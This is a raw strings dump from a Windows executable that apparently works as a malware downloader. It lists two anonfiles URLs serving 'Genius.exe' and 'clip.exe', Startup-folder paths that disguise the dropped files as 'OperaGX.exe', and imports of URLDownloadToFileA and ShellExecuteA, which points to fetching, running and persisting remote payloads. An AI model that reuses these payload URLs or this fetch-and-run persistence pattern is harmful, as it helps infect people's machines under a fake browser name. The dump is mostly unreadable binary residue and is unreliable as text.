!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
u"h,Q@
bad allocation
Unknown exception
bad array new length
string too long
AGsftdwet
APPDATA
\Microsoft\Windows\Start Menu\Programs\Startup\OperaGX.exe
\Microsoft\Windows\Start Menu\Programs\Startup\OperaGX2.exe
https://cdn-127.anonfiles.com/J7G6C4G5u8/3d1ad5b5-1631205598/Genius.exe
https://cdn-130.anonfiles.com/l6H0CaGau3/caa46519-1631205711/clip.exe
.text$mn
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.rsrc$01
.rsrc$02
ShellExecuteA
SHELL32.dll
?_Xlength_error@std@@YAXPBD@Z
MSVCP140.dll
URLDownloadToFileA
urlmon.dll
__CxxFrameHandler3
__std_exception_destroy
__std_exception_copy
__current_exception
__current_exception_context
memset
_except_handler4_common
_CxxThrowException
VCRUNTIME140.dll
__acrt_iob_func
__stdio_common_vfprintf
_invalid_parameter_noinfo_noreturn
getenv
_seh_filter_exe
_set_app_type
__setusermatherr
_configure_narrow_argv
_initialize_narrow_environment
_get_initial_narrow_environment
_initterm
_initterm_e
_set_fmode
__p___argc
__p___argv
_cexit
_c_exit
_register_thread_local_exe_atexit_callback
_configthreadlocale
_set_new_mode
__p__commode
_callnewh
malloc
_initialize_onexit_table
_register_onexit_function
_crt_atexit
_controlfp_s
terminate
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-environment-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsProcessorFeaturePresent
GetModuleHandleW
GetCurrentProcess
TerminateProcess
KERNEL32.dll
memcpy
memmove
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
060O0`0t0
1/1@1I1o1
7(8=8B8G8h8m8z8
;.;C;J;P;b;l;
<Z<i<r<
< =E=N=T=g=3>S>]>}>
> ?)?.?A?U?Z?m?
0)070=0C0I0O0U0\0c0j0q0x0
1#1)1=1U1_1h1
2 2[2e2n2w2
3%3/353;3A3G3M3S3Y3_3e3k3q3w3}3
1 1$1@1D1H1L1P1T1X1\1`1d1x1|1
1\3`3h3
4 4$4,4D4T4X4\4`4d4l4p4x4
8 8<8@8\8`8h8p8x8|8